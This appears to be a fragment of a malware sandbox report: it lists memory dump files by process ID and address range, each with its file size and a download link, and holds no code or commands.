    • memory/2612-368-0x0000000004220000-0x000000000424E000-memory.dmp

      Filesize

      184KB

      Download

    • memory/2636-169-0x0000000074A30000-0x0000000074A4B000-memory.dmp

      Filesize

      108KB

      Download

    • memory/2636-333-0x00000000005C0000-0x00000000005CF000-memory.dmp

      Filesize

      60KB

      Download

    • memory/2636-76-0x00000000749B0000-0x00000000749C1000-memory.dmp

      Filesize

      68KB

      Download

    • memory/2636-78-0x00000000005C0000-0x00000000005CF000-memory.dmp

      Filesize

      60KB

      Download

    • memory/2636-173-0x0000000000400000-0x0000000000509000-memory.dmp

      Filesize

      1.0MB

      Download

    • memory/2636-170-0x00000000749B0000-0x00000000749C1000-memory.dmp

      Filesize

      68KB

      Download

    • memory/2636-168-0x0000000000400000-0x0000000000509000-memory.dmp

      Filesize

      1.0MB

      Download

    • memory/2636-59-0x0000000074A30000-0x0000000074A4B000-memory.dmp

      Filesize

      108KB

      Download

    • memory/2636-332-0x00000000749B0000-0x00000000749C1000-memory.dmp

      Filesize

      68KB

      Download

    • memory/2636-330-0x0000000000400000-0x0000000000509000-memory.dmp

      Filesize

      1.0MB

      Download

    • memory/2636-331-0x0000000074A30000-0x0000000074A4B000-memory.dmp

      Filesize

      108KB

      Download

    • memory/2636-171-0x00000000005C0000-0x00000000005CF000-memory.dmp

      Filesize

      60KB

      Download

    • memory/2636-347-0x0000000000400000-0x0000000000509000-memory.dmp

      Filesize

      1.0MB

      Download

    • memory/3052-2-0x0000000000401000-0x00000000004B7000-memory.dmp

      Filesize

      728KB

      Download

    • memory/3052-0-0x0000000000400000-0x00000000004DC000-memory.dmp

      Filesize

      880KB

      Download

    • memory/3052-84-0x0000000000400000-0x00000000004DC000-memory.dmp

      Filesize

      880KB

      Download

    • memory/3068-167-0x0000000000400000-0x0000000000429000-memory.dmp

      Filesize

      164KB

      Download

    • memory/3068-348-0x0000000000400000-0x0000000000429000-memory.dmp

      Filesize

      164KB

      Download

    • memory/3068-37-0x0000000000400000-0x0000000000429000-memory.dmp

      Filesize

      164KB

      Download